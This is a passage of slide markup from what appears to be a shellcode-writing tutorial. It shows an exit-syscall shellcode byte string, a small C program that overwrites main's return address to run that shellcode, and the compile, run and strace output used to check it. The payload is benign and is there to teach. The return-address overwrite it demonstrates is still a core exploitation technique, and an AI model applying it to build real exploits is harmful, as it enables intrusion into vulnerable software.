              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>The second column contains the opcodes we need. Therefore, we can write our first shellcode and test it with a very simple C program "borrowed" from [Phrack]:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178"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79" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{91C1A1E1-9191-4111-A191-01818191A1F1}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295280" y="2306880"/>
            <a:ext cx="6933960" cy="3864960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>char shellcode[] = "\xbb\x00\x00\x00\x00"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>"\xb8\x01\x00\x00\x00"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>"\xcd\x80";</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>int main()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>*ret;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>ret = (int *)&amp;ret + 2;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>(*ret) = (int)shellcode;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </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699120" y="609480"/>
            <a:ext cx="7745040" cy="5516280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>they simply overwrite the return address of the main() function with the address of the shellcode, in order to execute the shellcode instructions upon exit </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>from main(). After the first declaration, the stack will </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>look like:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Return address &lt;-- Return address (pushed by the CALL instruction) to store in EIP upon exit Saved EBP &lt;-- Saved EBP (to be restored upon exit from the function) ret&lt;-- First local variable of the main() function </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182"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83" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{B1F13161-81E1-4171-A131-414121A10021}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>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699120" y="533520"/>
            <a:ext cx="7745040" cy="5592240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>The second instruction increments the address of the ret variable by 8 bytes (2 dwords) to obtain the address of the return address, i.e. the pointer to the </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>first instruction which will be executed upon exit </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>from the main() function. Finally, the third </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>instruction overwrites this address with the address </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>of the shellcode. At this point, the program exits </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>from the main() function, restores EBP, stores the </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>address of the shellcode in EIP and executes it.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185"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86" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{7151C131-9141-4181-91E1-B16191915141}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>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699120" y="838080"/>
            <a:ext cx="7745040" cy="5287680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>To see all this in operation, we just have to compile sc_exit.c and run it:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188"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89" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{01F11151-B171-4171-91A1-D1B14171E171}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676520" y="2438280"/>
            <a:ext cx="4952520" cy="2819160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$ gcc -o sc_exit sc_exit.c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$ ./sc_exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </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699120" y="457200"/>
            <a:ext cx="7745040" cy="5668560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Let me guess: your mouth is not really wide open in amazement! Anyway, if we want to make sure it has really been our shellcode to make the program exit, we can verify it with strace:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192"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93" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{C1313191-C141-4100-A1D1-71313101F141}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="2209680"/>
            <a:ext cx="6400440" cy="3930840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$ strace ./sc_exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>execve("./sc_exit", ["./sc_exit"], [/* 16 vars */]) = 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>uname({sys="Linux", node="Knoppix", ...}) = 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>brk(0)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= 0x8049588</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x40017000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>access("/etc/ld.so.nohwcap", F_OK)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= -1 ENOENT (No such file or directory)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>open("/etc/ld.so.preload", O_RDONLY)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= -1 ENOENT (No such file or directory)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>open("/etc/ld.so.cache", O_RDONLY)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
